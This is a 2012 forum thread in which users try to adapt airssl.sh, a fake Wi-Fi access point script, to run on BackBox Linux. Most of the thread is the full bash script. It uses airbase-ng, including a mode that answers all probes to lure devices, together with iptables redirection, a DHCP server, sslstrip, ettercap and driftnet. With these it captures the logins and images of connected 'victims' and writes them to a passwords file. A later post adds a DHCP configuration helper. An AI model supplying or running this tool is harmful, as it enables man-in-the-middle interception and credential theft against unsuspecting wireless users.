Can anyone get thi script to work properly on Backbox? airssl.sh

Started by n1tr0g3n_0x1d3, March 22, 2012, 10:32:28 PM

Previous topic - Next topic

n1tr0g3n_0x1d3

This is an Fake AP creator which runs sslstrip which would be nice to see 100% running on Backbox, it's almost working as is though.


Here's the link to the script   http://hitman-pt.zzl.org/downloads/airssl.sh

And here is a post about the script it's self and how to configure it..  http://hitmanpt.wordpress.com/2011/01/29/backtrack-fake-wifi-ap/

It was made for crapTrack but should be easily fixed to run on Backbox I'm pretty sure if you are good at bash scripting. Any help would be appreciated Thnaks guys..


I tried to get it working but no luck... Thanks again for your help.

ostendali

This script is customized for BT...
it is very simple script and can be easily adapted to backbox, but who are the owners?
do you know them.....because we can't manipulate it by adapting to our system without their consensus hence it has not been declared any license on it.....
when there are no license declared the app is automatically proprietary....
where did you get this script if may I ask?

n1tr0g3n_0x1d3

This guy seems to be the originator of the script    killadaninja  over on the BT forums but it would be safe to say we couldn't ask about anything with the word backbox in it over at the BT forums because the admins might have a small heart attack and need to be rushed to the nearest emergency room LOL   ;D much less the message never make it to him because of moderation hating lol Would be awesome to see it running on Bbox though. Hope we can figure something out   :)  Thanks for the quick reply ostendali

ostendali

actually it is not big deal to re-write a script like that.....
but don't want to give the idea that it is copied from this one...
so, will think about and see what we can do regardless...

weVeg

Quote from: n1tr0g3n_0x1d3 on March 22, 2012, 10:32:28 PM
This is an Fake AP creator which runs sslstrip which would be nice to see 100% running on Backbox, it's almost working as is though.


Here's the link to the script   http://hitman-pt.zzl.org/downloads/airssl.sh["/color]

And here is a post about the script it's self and how to configure it..   http://hitmanpt.wordpress.com/2011/01/29/backtrack-fake-wifi-ap/

It was made for crapTrack but should be easily fixed to run on Backbox I'm pretty sure if you are good at bash scripting. Any help would be appreciated Thnaks guys..


I tried to get it working but no luck... Thanks again for your help.
Se vuoi io ho scritto una cosa molto simile... Ha qualche problemino nel caricare il dhcpd.conf e non so se è un problema mio o un bug, visto che in rete ho trovato errori simili ma con le più disperate soluzioni... Se lo vuoi mi fai pure da "tester" per il resto funziona abbastanza...

Edit: in realtà no, ti ho detto una cazzata, ho letto tutto lo script, il mio prepara karma e il server dhcp e te lo carica in metasploit, per metà è uguale, cambia l'ultima parte quando fa partire ettercap che a me non serve, ma se prendi metà di questo e metà di un altro script che ho postato per lo sniff con sslstrip e arpspoof ci tiri fuori quasi la stessa cosa... O se vuoi ne riscriviamo uno da capo che tanto è semplice!
una voce libera è sempre liberatrice
under_r00t

n1tr0g3n_0x1d3

#5


Ok I'm about 98% complete with the Airssl script working completely on Backbox. The only problem I am having is that I can't obtain an IP after connecting to the Fake AP. I put a lot of time into editing this script and it's been on my mind for a while as to getting it working on backbox. I haven't had much help on it at all and no one seems to be willing to get this script converted for BB. I think it would be great to have a Fake AP generator that takes about 15 seconds to set up and which sniffs SSL logins and runs urlsnarf along with driftnet. I din't create the script but I have dreams to one day having it working on Backnox. If anyone can point out the issue in the script that's giving me the headache it would be greatly appreciated. i'm not looking for a handout since I've spent about 10 hours editing & researching about creating Fake Ap's and all to be able to understand the script and get it working. It wasn't easy to get it running this good and it was missing a few lines right off the bat that stopped the script from creating the interface plus it was written to use tap interface at0 and I changed it to use mon0 as the Alfa card uses. Hope the community can get this running with me as it would be an early Christmas gift and be an awesome script for the community  to enjoy  : )  Just hoping someone sees that I have tried to get this script 100% but I'm stuck between lines #108  &   #110 and think this is where the problem lies.  Here's the edited script below for you to test out and see this has some huge potential.

I would think that the line option domain-name-servers 10.0.0.1;  should be set something like 8.8.8.8 or 4.2.2.2 as well.


https://www.onlinefilefolder.com/4sqxnjzcqZ7ZZi




#!/bin/bash
# (C)opyright 2009 - killadaninja - Modified G60Jon 2010
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

# Network questions
echo
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon  "
echo
route -n -A inet | grep UG
echo
echo
echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
read -e gatewayip
echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"

# Dhcpd creation
mkdir -p "/backbox/wireless_analysis/airssl"
echo "authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.20 10.0.0.50;

}" > /backbox/wireless_analysis/airssl/dhcpd.conf

# Fake ap setup
echo "
  • Configuring FakeAP...."
    echo
    echo "Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches? "
    echo
    echo "Choose Y to see airbase-ng help and add switches. "
    echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
    echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
    echo "Y, N or A "


    read ANSWER

    if [ $ANSWER = "y" ] ; then
    airbase-ng --help
    fi

    if [ $ANSWER = "y" ] ; then
    echo
    echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
    redefined, also in this mode you MUST define a channel "
    read -e aswitch
    echo
    echo "
  • Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi

    if [ $ANSWER = "a" ] ; then
    echo
    echo "
  • Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -v -e "$ESSID" -c 11 -P -C 30 $fakeap_interface & fakeapid=$!
    sleep 2
    fi


    if [ $ANSWER = "n" ] ; then
    echo
    echo "
  • Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi

    # Tables
    echo "
  • Configuring forwarding tables..."
    ifconfig lo up
    ifconfig mon0 up &
    sleep 1
    ifconfig mon0 10.0.0.1 netmask 255.255.255.0
    ifconfig mon0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface mon0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    # DHCP
    echo "
  • Setting up DHCP..."
    touch /var/run/dhcpd.pid
    chown dhcpd:dhcpd /var/run/dhcpd.pid
    xterm -geometry 75x20+1+100 -T DHCP -e dhcpd -d -f -cf "/backbox/wireless_analysis/airssl/dhcpd.conf" mon0 & dchpid=$!
    sleep 3

    # Sslstrip
    echo "
  • Starting sslstrip..."
    xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
    sleep 2

    # Ettercap
    echo "
  • Configuring ettercap..."
    echo
    echo "Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose N "
    echo "Y or N "
    read ETTER
    if [ $ETTER = "y" ] ; then
    ettercap --help
    fi

    if [ $ETTER = "y" ] ; then
    echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
    For the sake of airssl, ettercap WILL USE -u and -p so you are advised
    NOT to use -M, also -i is already set and CANNOT be redifined here.
    Ettercaps output will be saved to /pentest/wireless/airssl/passwords
    DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
    echo
    read "eswitch"
    echo "
  • Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i mon0 & ettercapid=$!
    sleep 1
    fi

    if [ $ETTER = "n" ] ; then
    echo
    echo "
  • Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i mon0 & ettercapid=$!
    sleep 1
    fi

    # Driftnet
    echo
    echo "
  • Driftnet?"
    echo
    echo "Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), "
    echo "Y or N "
    read DRIFT

    if [ $DRIFT = "y" ] ; then
    mkdir -p "/pentest/wireless/airssl/driftnetdata"
    echo "
  • Starting driftnet..."
    driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
    sleep 3
    fi

    xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

    clear
    echo
    echo "
  • Activated..."
    echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
    echo
    echo "
  • IMPORTANT..."
    echo "After you have finished please close airssl and clean up properly by hitting Y,
    if airssl is not closed properly ERRORS WILL OCCUR "
    read WISH

    # Clean up
    if [ $WISH = "y" ] ; then
    echo
    echo "
  • Cleaning up airssl and resetting iptables..."

    kill ${fakeapid}
    kill ${dchpid}
    kill ${sslstripid}
    kill ${ettercapid}
    kill ${dritnetid}
    kill ${sslstriplogid}

    airmon-ng stop $fakeap_interface
    airmon-ng stop $fakeap
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain

    echo "
  • Clean up successful..."
    echo "
  • Thank you for using airssl, Good Bye..."
    exit

    fi
    exit




weVeg

look: http://pastebin.com/jbeALQDf

this is function that i use to configure server dhcp, i have worked hard 'cause the config file must be saved on /etc/dhcp/ , change folder!!! and write it line by line!

dh_conf="/etc/dhcp/dhcpdevi.conf" ;

i_man="wlan0" ;
i_mon="mon0" ;
essid="TEST" ;
net="10.0.0.0" ;
net_mask="255.255.255.0" ;
ip_ap="10.0.0.1" ;
fun_dhcp () {
       if [ -e $dh_conf ]
               then
                       echo
                       echo "[ok] dh_conf presente"
               else
                       echo
                       echo "sto scrivendo il file di configurazione"
                       touch $dh_conf  
                       echo "option domain-name-servers $ip_ap ;" >> $dh_conf
                       echo "default-lease-time 60;" >> $dh_conf
                       echo "max-lease-time 7200;" >> $dh_conf
                       echo "ddns-update-style none;" >> $dh_conf
                       echo "authoritative;" >> $dh_conf
                       echo "log-facility local7;" >> $dh_conf
                       echo "subnet $net netmask $net_mask {" >> $dh_conf
                       echo "range 10.0.0.50 10.0.0.254;" >> $dh_conf
                       echo "option routers $ip_ap ;" >> $dh_conf
                       echo "option domain-name-servers $ip_ap ;" >> $dh_conf
                       echo "}" >> $dh_conf
                       sudo chmod 777 $dh_conf
       fi
       }
una voce libera è sempre liberatrice
under_r00t